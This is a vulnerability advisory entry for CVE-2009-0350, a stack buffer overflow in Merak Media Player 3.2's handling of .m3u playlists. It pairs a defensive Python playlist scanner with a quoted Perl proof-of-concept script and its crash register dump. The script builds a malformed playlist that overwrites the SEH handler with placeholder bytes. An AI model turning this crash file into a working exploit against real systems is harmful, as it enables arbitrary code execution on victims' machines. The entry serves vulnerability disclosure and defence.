Merak Media Player .m3u File Handling Stack Overflow Vulnerability

Vulnerability ID: 1117286    Vulnerability type: Buffer overflow
Published: 2009-01-25    Updated: 2009-03-03
CVE ID: CVE-2009-0350    CNNVD-ID: CNNVD-200901-446
Platform: Windows    CVSS score: 9.3
|Vulnerability source
https://www.exploit-db.com/exploits/7857
https://www.securityfocus.com/bid/33419
https://cxsecurity.com/issue/WLB-2009010249
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-446
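|Vulnerability details
Merak Media Player (Chinese name: 木子播放器) supports multiple file formats. Merak Media Player has a stack overflow vulnerability when it processes the ToolTip text of its status bar icon. If a user is tricked into opening a specially crafted playlist (.m3u) file, the overflow is triggered, which can lead to arbitrary code execution.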
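A triage check for playlist files before they reach a player, given as an added example that is not part of the original advisory or of the Merak project. The function name, the 260-byte limit (Windows MAX_PATH) and the 32-byte filler threshold are assumptions chosen for illustration; long stream URLs may need a higher limit.

```python
import re

# Assumption: 260 bytes (Windows MAX_PATH) is the longest plausible playlist line.
MAX_LINE_LEN = 260
# Assumption: 32 or more repeats of a single byte are treated as filler padding.
FILLER_RUN = re.compile(rb"(.)\1{31,}", re.DOTALL)


def scan_m3u(data: bytes, max_len: int = MAX_LINE_LEN):
    """Return one finding per suspicious line in the raw bytes of an .m3u file."""
    findings = []
    if data.startswith(b"\xef\xbb\xbf"):  # drop a UTF-8 byte order mark
        data = data[3:]
    # Split on CRLF, LF or bare CR so the line terminator style does not matter.
    for lineno, raw in enumerate(re.split(rb"\r\n|\n|\r", data), start=1):
        line = raw.strip()
        if not line:
            continue
        # Directive lines (#EXTM3U, #EXTINF) are checked too: which field the
        # player copies into its tooltip is not stated on the page.
        reasons = []
        if len(line) > max_len:
            reasons.append("length %d > %d" % (len(line), max_len))
        run = FILLER_RUN.search(line)
        if run:
            reasons.append("filler run of 0x%02x x%d"
                           % (run.group(1)[0], len(run.group(0))))
        if any(b < 0x20 and b != 0x09 for b in line):
            reasons.append("control bytes in line")
        if reasons:
            findings.append({"line": lineno, "length": len(line),
                             "reasons": reasons})
    return findings


# Constructed samples, not taken from a real incident.
BENIGN = b"#EXTM3U\r\n#EXTINF:123,Artist - Title\r\nC:\\Music\\track01.mp3\r\n"
# One 1202-byte line with no newline, the size of the file the script on this
# page writes; the content here is plain filler.
OVERSIZED = b"A" * 1202

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(name, scan_m3u(sample))
```
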
|Exploit (EXP)
#!/usr/bin/perl -w

# Author : Houssamix

# Merak Media Player V3.2  m3u file Local Buffer overflow (SEH) 
# Download :  http://www.qwerks.com/download/3748/merak.zip

# --------------------------------------------
# EAX 00000000
# ECX 45454545
# EDX 7C9137D8 ntdll.7C9137D8
# EBX 00000000
# ESP 0013F784
# EBP 0013F7A4
# ESI 00000000
# EDI 00000000
# EIP 45454545

# 0013FBE4   42424242  Pointer to next SEH record
# 0013FBE8   45454545  SE handler
# ---------------------------------------------

print "===================================================================== \n";
print "Author : Houssamix 						     \n";
print "===================================================================== \n";
print "Merak Media Player V3.2  m3u file Local Buffer overflow (SEH) 		 \n";
print "===================================================================== \n";

my $buf = "\x42" x 78;
my $seh = "\x45\x45\x45\x45";
my $buff = "\x43" x 1120;
my $file="hsmx.m3u";
$exploit = $buf.$seh.$buff;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "$file has been created \n";

# milw0rm.com [2009-01-25]
|Affected products
Qwerks Merak Media Player 3.2
|References

Source: MILW0RM
Name: 7857
Link: http://www.milw0rm.com/exploits/7857
Source: SECUNIA
Name: 33645
Link: http://secunia.com/advisories/33645
Source: OSVDB
Name: 51565
Link: http://osvdb.org/51565